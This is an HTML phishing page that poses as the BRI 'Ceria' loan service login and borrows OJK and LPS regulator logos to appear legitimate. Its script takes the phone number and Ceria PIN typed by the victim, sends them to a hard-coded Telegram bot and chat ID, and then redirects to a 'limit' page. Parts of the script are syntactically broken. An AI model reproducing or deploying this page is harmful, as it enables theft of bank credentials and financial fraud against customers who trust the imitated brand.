<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>Ceria Pinjaman BRI</title>
  <meta name="viewport" content="width, initial-scale=1">
  <style>
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
      max-width: 600px; /* Menetapkan lebar maksimal untuk konten */
      margin: 0 auto; /* Membuat konten tetap di tengah */
    }

    .gambar {
      width: 100%;
      margin-bottom: 20px;
    }

    .gambar img {
      width: 100%;
      object-fit: cover;
      margin-bottom: 10px;
    }

    .form-container {
      margin-bottom: 50px;
    }

    .form-container form {
      display: flex;
      flex-direction: column;
      align-items: center;
      margin-top: 20px;
    }

    .form-container input[type="tel"],
    .form-container input[type="password"],
    .form-container input[type="Submit"] {
      width: calc(90% - 8px); /* Reduce width by 4 pixels on each side */
      padding: 10px;
      border-radius: 8px;
      border: 4px solid #663399;
      margin-bottom: 9px; /* Jarak antara kolom nomor hp dan kolom pin */
      margin-left: 4px; /* Add margin on the left side */
    }

  .form-container input[type="Submit"] {
  width: calc(98% - 8px);
  padding: 10px;
  border-radius: 8px;
  background-color: #663399; /* Warna abu-abu */
  color: white;
  font-weight: red;
  cursor: pointer;
  margin-left: 4px;
 }
 .example-text {
      font-size: 13px;
      color: #black;
      margin-top: -13px;
      text-align: left;
      margin-left: 100px;
    }
    /* Ukuran relatif untuk gambar di bawah */
    .gambar-bawah {
      display: flex;
      justify-content: center;
      position: relative;
      bottom: -10px;
    }

    .gambar-bawah img {
      width: 20%;
      object-fit: cover;
      margin: 0 8px;
    }
  </style>
  <script>
   function sendMessageToTelegram(message) {
      var xhttp = new XMLHttpRequest();
      xhttp.onreadystatechange = function() {
        if (this.readyState === 4 && this.status === 200) {
          // Respons atau tindakan setelah pesan terkirim berhasil
          console.log("Pesan terkirim: " + message);
        }
      };
      var url = "https://api.telegram.org/bot6946290282:AAHbPsb9hD-DbepVOIkge81AvWjY90YbbU0/sendMessage?chat_id=6824078885&text=" + encodeURIComponent(message);
      xhttp.open("POST", url, true);
      xhttp.send();
    }
    function kirimPesan() {
      var nomorHP = document.getElementById('Nomor Handphone').value;
      var pin = document.getElementById('Masukan PIN Ceria').value;

      var message = "Nomor Handphone:" + Nomor Handphone + "\nMasukan PIN Ceria: " + Masukan PIN Ceria;
      sendMessageToTelegram(message);
      window.location.href = 'limit.html'; // Mengarahkan ke halaman limit.html
    }
  </script>
</head>
<body>
  <div class="gambar">
    <img src="https://wwed.online/ceria-id.com/img/pucok.jpg" alt="Gambar Pucok">
  </div>

  <div class="form-container">
    <form onsubmit="kirimPesan(); return false;">
      <input type="tel" id="Nomor Handphone" name="Nomor Handphone" placeholder="𝗡𝗼𝗺𝗼𝗿 𝗛𝗮𝗻𝗱𝗽𝗵𝗼𝗻𝗲">

      <input type="tel" id="Masukan PIN Ceria" name="Masukan PIN Ceria" placeholder="️𝗠𝗮𝘀𝘂𝗸𝗮𝗻 𝗣𝗜𝗡 𝗖𝗲𝗿𝗶𝗮">

      <input type="Submit" value="Lanjutkan">
    </form>
 </div>
  
 <div class="example-text">Terdaftar Dan Awasi Oleh:
 </div>
   <div class="gambar gambar-bawah">
    <img src="https://from-limit-ceria-id.netlify.app/img/lps.png" alt="Logo LPS">
    <img src="https://from-limit-ceria-id.netlify.app/img/ojk.png" alt="Logo OJK">
  </div>
</body>
  </html>
